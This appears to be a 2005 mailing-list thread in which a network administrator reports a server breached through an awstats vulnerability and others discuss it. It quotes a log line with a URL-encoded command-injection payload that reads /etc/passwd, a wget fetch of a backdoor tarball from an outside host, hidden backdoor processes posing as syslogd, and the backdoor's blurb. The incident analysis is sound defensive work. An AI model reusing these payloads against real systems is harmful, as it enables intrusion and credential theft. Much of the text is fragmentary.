http://www.rootkit.nl/projects/rootkit_hunter.html
--
=+==+==+==+==+==+==+==+==+==+==+==+=
Dragomir Zhelev
Network Administrator IT Support
Varna,Bulgaria
[EMAIL PROTECTED]
=+==+==+==+==+==+==+==+==+==+==+==+=
awstats.
psybnc, tw port backdoor
82.96.126.130 - - [22/Feb/2005:22:06:11 +0200] GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcat%20%2fetc%2fpasswd%
On Wed, Feb 23, 2005 at 12:06:48AM +0200, D. Dilev wrote:
pw2 :
top
4021 nobody 9 0 336 336 284 S 0.0 0.1 0:00 0 x0a
4028 nobody 9 0 260 260 216 S 0.0 0.1 0:00 0 x0b
:)
ps ax x0b syslogd, x0a
x0a x0b 2
pw2 :
top
4021 nobody 9 0 336 336 284 S 0.0 0.1 0:00 0 x0a
4028 nobody 9 0 260 260 216 S 0.0 0.1 0:00 0 x0b
:)
ps ax x0b syslogd, x0a
x0a x0b 2tw.tar.gz, ...
psyBNC- http://www.psychoid.net/
On Tue, Feb 22, 2005 at 11:31:38PM +0200, D. Dilev wrote:
[format recovered, wrap- 72 ...
http://www.lemis.com/email/email-format.html]
:)
awstats 2.
22:04 awstats
#tail -f /var/log/apache/*
...
awstats error.log :
http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities&flashstatus=true
On , 2005-02-22 at 23:31 +0200, D. Dilev wrote:
:)
awstats 2.
22:04 awstats
#tail -f /var/log/apache/*
... awstats
error.log :
D. Dilev wrote:
:)
awstats 2.
22:04 awstats .
#tail -f /var/log/apache/*
... awstats error.log
cut
sh: line 1: /awstats.mydomain.com.conf: No such file or directory
--22:04:48-- http://www.petry.se/public_html/tw.tar.gz
=
D. Dilev wrote:
59768 port backdoor
no password needed , easy to install and hiding from ps and ps ax:D
have phun !
wget at home.ro
--
Georgi Genov
[EMAIL PROTECTED]
A mail-list of Linux Users Group - Bulgaria